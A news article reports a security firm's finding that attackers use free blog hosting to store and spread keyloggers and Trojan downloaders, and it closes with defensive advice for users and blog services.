Hackers Use Blogs To Spread Worms, Keyloggers

Blogs aren't just for blabbing to friends and family, but increasingly are being used as a safe haven by hackers for storing and distributing malicious code.
Blogs aren't just for blabbing to friends and family, said a security and content filtering firm Wednesday, but increasingly are being used as a safe haven by hackers for storing and distributing malicious code, including identity-stealing keyloggers.

"We're seeing that more and more of the locations where malicious code is stored is on blog sites," said Dan Hubbard, the senior director of security and technology research for San Diego-based Websense. So far this year, Hubbard said, his lab has discovered hundreds of blogs involved in the storage and delivery of harmful code.

"In particular, keyloggers and other Trojan downloaders and droppers are being stored and updated from blog sites," Hubbard added. A keylogger is the term for a type of spyware that watches for, records, then transmits to the hacker identities surreptitiously hijacked from PCs.

Malware and spyware writers are turning to blogs -- and away from traditional hosting and/or e-mail services -- because they offer large amounts of free storage space, they don't require any identity authentication to post, and most blog hosting services don't scan posted files for viruses, worms, or spyware.

"It's partly the storage, partly the ease of use [of blogs], and partly a stability issue. Hacked machines, for instance, can easily go down if the actual owner discovers his computer's being used, but the blogs are always there," said Hubbard.

Different hackers use blogs different ways. Some may create a blog on a legitimate service, then post viral or keylogging code on the page, and entice users to visit the page -- where they're infected -- using spam or spim. Others may use the blog only as storage for malware which previously-planted Trojan horses access to update themselves or install a keylogger onto the infected PC.

"In those cases, victims don't even see the blog or the blog site," said Hubbard. "Hackers are using the storage space on the blog site because, unlike personal storage and mail hosting facilities, most blogs aren't running anti-virus software on posted files."

The use of blogs further disguises the true identity of the hacker, and adds another route in the labyrinth-like path that attackers use to disseminate their code.

In late March, for instance, Websense issued an alert that outlined how a spoofed e-mail tried to redirect recipients to a blog which in turn hosted a Trojan horse designed to steal online banking passwords.

"The blogs are being used as the first step of a multi-layered attack that could also involve a spoofed e-mail, Trojan horse, or a keylogger," explained Hubbard.

While end-users can do little beyond keep safe and smart practices in mind -- don't open attachments, don't travel to questionable links within e-mail or instant messages -- Hubbard said there was plenty blog hosting services could do.

"They need to add some type of security on top," he urged. "Anti-virus is a good start. And limit the type of files that can be uploaded, by, for example, restricting executables."